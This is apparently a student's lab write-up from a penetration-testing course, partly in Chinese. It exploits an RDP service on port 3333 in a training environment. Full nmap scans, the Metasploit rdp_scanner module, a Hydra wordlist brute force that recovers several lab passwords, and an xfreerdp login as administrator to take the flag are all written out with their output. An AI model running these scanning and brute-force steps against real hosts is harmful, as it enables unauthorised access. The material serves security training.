Penetration Testing Student v2 Host & Network Penetration Testing System/Host Based Attacks

Exploiting RDP

Posted by r3kind1e on September 15, 2022

Exploiting RDP

远程桌面协议 (RDP) 是微软开发的专有 GUI 远程访问协议,用于远程连接 Windows 系统并与之交互。

RDP 默认使用 TCP 端口 3389,也可以配置为在任何其他 TCP 端口上运行。

RDP 身份验证需要目标系统上的合法用户帐户以及明文形式的用户密码。

我们可以执行 RDP 暴力攻击来识别合法的用户凭据,我们可以使用这些凭据来远程访问目标系统。

Demo: Exploiting RDP

1

Target IP Address: 10.2.24.86

This particular port is not assigned to any service. RDP can be configured run on another port instead of default port.

1
2
3

nmap -sV -O 10.2.24.86
nmap -sV -p- 10.2.24.86
nmap -sV 10.2.24.86

How do you check a port and determine wether or not it is running RDP? One of the technique is connect to the target system and specify this particular port as a RDP port.

Another really helpful tool or module is the Metasploit module on RDP scanner.

To tell wether the particular port is running RDP.

Identify endpoints speaking the Remote Desktop Protocol (RDP)

识别使用远程桌面协议 (RDP) 的端点

此模块尝试连接到指定的远程桌面协议端口并确定它是否使用 RDP。 如果可用,凭据安全支持提供程序 (CredSSP) 协议将用于识别运行服务器的 Windows 版本。 启用 DETECT_NLA 选项将导致与服务器建立第二个连接,以确定是否需要网络级别身份验证 (NLA)。

1
2
3
4
5
6
7
8

service postgresql start && msfconsole

search rdp_scanner
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS 10.2.24.86
set RPORT 3333
run

However, We can’t authenticate with target system via RDP because we don’t have any credentials. Performing Brute force on RDP.

Hydra

-s PORT: if the service is on a different default port, define it here

-s PORT: 如果服务位于不同的默认端口,请在此处定义

-t TASKS: run TASKS number of connects in parallel per target (default: 16)

-t TASKS: 运行 TASKS 每个目标的并行连接数(默认值:16)

1

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.2.24.86 -s 3333

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

xfreerdp [file] [options] [/v:<server>[:port]]

/option:<value> (specifies option with value)

/p:<password>                     Password

/u:[[<domain>\]<user>|<user>[@<domain>]]
                                      Username

/v:<server>[:port]                Server hostname

Examples:
    xfreerdp connection.rdp /p:Pwd123! /f
    xfreerdp /u:CONTOSO\JohnDoe /p:Pwd123! /v:rdp.contoso.com
    xfreerdp /u:JohnDoe /p:Pwd123! /w:1366 /h:768 /v:192.168.1.100:4489
    xfreerdp /u:JohnDoe /p:Pwd123! /vmconnect:C824F53E-95D2-46C6-9A18-23A5BB403532 /v:192.168.1.100

1

xfreerdp /u:administrator /p:qwertyuiop /v:10.2.24.86:3333

Windows: Insecure RDP Service(Windows:不安全的 RDP 服务)

概述

向您提供了一台 Kali GUI 机器和一台运行易受攻击的 RDP 服务的目标机器。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。

您的任务是使用 Kali 机器上可用的工具对正在运行的 RDP 服务及其有效端口进行指纹识别,然后使用适当的方法利用该漏洞。

注意: rdesktop 不适用于此设置,因为它不支持 NLA。请使用 xfreerdp 连接到 RDP 服务器。

目标: 利用应用程序并检索标志!

注意:rdesktop 不适用于此设置,因为它不支持 NLA。请使用 xfreerdp 连接到 RDP 服务器。

说明:

  • 你的 Kali 机器有一个 IP 地址为 10.10.XY 的接口 运行 “ip addr” 可以知道 X 和 Y 的值。
  • 目标机器的 IP 地址在文件 “/root/Desktop/target” 中提到
  • 不要攻击位于 IP 地址 192.VW1 和 10.10.X.1 的网关
  • 要使用的字典:+ /usr/share/metasploit-framework/data/wordlists/common_users.txt + /usr/share/metasploit-framework /data/wordlists/unix_passwords.txt

我自己的思路

1

Target IP Address : 10.0.16.124

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

root@attackdefense:~# nmap -sV 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:26 IST
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

root@attackdefense:~# nmap -sV -p- -O 10.0.16.124
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-15 08:31 IST
Stats: 0:02:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.0.16.124
Host is up (0.0030s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
5985/tcp  open  http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
49178/tcp open  msrpc          Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=9/15%OT=135%CT=1%CU=34927%PV=Y%DS=3%DC=I%G=Y%TM=632296
OS:17%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=7F%CD=Z)

Network Distance: 3 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.93 seconds

Identify endpoints speaking the Remote Desktop Protocol (RDP)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
10.0.16.124
msf5 > use auxiliary/scanner/rdp/rdp_scanner
msf5 auxiliary(scanner/rdp/rdp_scanner) > show options

Module options (auxiliary/scanner/rdp/rdp_scanner):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DETECT_NLA       true             yes       Detect Network Level Authentication (NLA)
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3389             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rhosts 10.0.16.124
rhosts => 10.0.16.124
msf5 auxiliary(scanner/rdp/rdp_scanner) > set rport 3333
rport => 3333
msf5 auxiliary(scanner/rdp/rdp_scanner) > run

[*] 10.0.16.124:3333      - Detected RDP on 10.0.16.124:3333      (Windows version: 6.3.9600) (Requires NLA: Yes)
[*] 10.0.16.124:3333      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.0.16.124 -s 3333 -t 4
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-15 08:55:26
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7063 login tries (l:7/p:1009), ~1766 tries per task
[DATA] attacking rdp://10.0.16.124:3333/
[3333][rdp] host: 10.0.16.124   login: sysadmin   password: samantha
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124   login: demo   password: victoria
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124   login: auditor   password: elizabeth
[ERROR] freerdp: The connection failed to establish.
[3333][rdp] host: 10.0.16.124   login: administrator   password: qwertyuiop
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-15 08:56:09


1

xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

root@attackdefense:~# xfreerdp /u:administrator /p:qwertyuiop /v:10.0.16.124:3333
[09:04:26:668] [177980:177981] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.0.16.124:3333) 
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - Common Name (CN):
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - 	WIN-OMCNBKR66MN
[09:04:26:693] [177980:177981] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.0.16.124:3333 (RDP-Server):
	Common Name: WIN-OMCNBKR66MN
	Subject:     CN = WIN-OMCNBKR66MN
	Issuer:      CN = WIN-OMCNBKR66MN
	Thumbprint:  81:80:6a:ce:02:6f:0b:ca:67:da:6c:33:13:83:bf:b3:a6:53:a3:12
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) y

We login in as Administrator, and find flag.txt in C:\:

1

port-number-3333

解决方案

此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1957.pdf

thc-hydra

Identify endpoints speaking the Remote Desktop Protocol (RDP)

CATALOG
    FEATURED TAGS
    Penetration Testing Student Penetration Testing Student v2 Host & Network Penetration Testing The Metasploit Framework (MSF) Post-Exploitation Exploitation Assessment Methodologies System/Host Based Attacks Penetration Testing Professional Resource Development & Initial Access Enumeration Network Attacks TryHackMe Web Attacks Client-Side Attacks Penetration Testing Prerequisites PowerShell for Pentesters Footprinting & Scanning IELTS Information Gathering System Attacks experience 留学 Network-Based Attacks 安全评估工具 C++ Career Python Vulnerability Assessment crypto
    FRIENDS